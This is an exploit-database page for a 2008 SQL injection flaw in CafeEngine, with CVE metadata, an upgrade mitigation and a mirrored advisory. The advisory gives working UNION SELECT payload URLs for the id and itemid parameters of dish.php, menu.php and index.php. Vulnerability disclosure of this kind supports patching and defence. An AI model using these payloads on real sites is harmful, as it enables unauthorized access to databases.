header-logo
Suggest Exploit
vendor:
CafeEngine
by:
0xFFFFFF
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CafeEngine
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:cafeengine:cafeengine:1.2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

CafeEngine Multiple Remote SQL Injection

CafeEngine is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied data before using it in an SQL query. An attacker can exploit these issues to manipulate SQL queries, disclose sensitive information, modify data, and potentially compromise the application and server.

Mitigation:

Upgrade to the latest version of CafeEngine.
Source

Exploit-DB raw data:

   ___________________________________________________________________________________________________________
  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  | 
  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ | 
  | |   /  \/                                                                                                 | 
  | |  / _____________________________________________________________________________________________________|
  | | / /                            .: CafeEngine Multipe remote SQL Injection :.                            | 
  | |/ /______________________________________________________________________________________________________|
  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       | 
  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
  |/    Country:       Algeria                             .                                                  |
  v___________________________________________________________________________________________________________|
  |     Publication info :.                                                                                   |
  |___________________________________________________________________________________________________________|
  |     Date:          19-09-2008                          . Method   :         [*] GET   [ ] POST            |
  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
  |     Type:          SQL injection                       . Magic quotes :     [*] ON    [ ] OFF             | 
  |     Application:   Easy-Cafeengine / Cafeengine        . Risk:              [*] High  [ ] medium  [ ] Low | 
  |     Venedor site:  http://cafeengine.com/              .                                                  | 
  |     Version:       N/A                                 .                                                  |
  |     Impact:        Exploring Database                  .                                                  |
  |     Exploit:       Available                           .                                                  |
  |     Fix:           N/A                                 .                                                  |
  |___________________________________________________________________________________________________________|
  | Description :.                                                                                            |
  |___________________________________________________________________________________________________________|
  | Input "id" passed into dish.php,menu.php pages is not properly verified,                                  | 
  | a visitor can easily get sensitive information from the database by injecting SQL Querys                  |
  | ......................................................................................................... |
  |                                                                                                           |
  | CafeEngine Exploit :                                                                                      | 
  | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10                                            |
  | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12                                      |
  |                                                                                                           | 
  | Easy-CafeEngine Exploit:                                                                                  | 
  | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9                                          |
  |___________________________________________________________________________________________________________|
  | Notice :.                                                                                                 |
  |___________________________________________________________________________________________________________|
  | These publications are published for educational purpose thus the author will be not responsible          |
  | for any damage.                                                                                           |
  |___________________________________________________________________________________________________________|
                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
                                                 \____________________________________________________________|

# milw0rm.com [2008-10-16]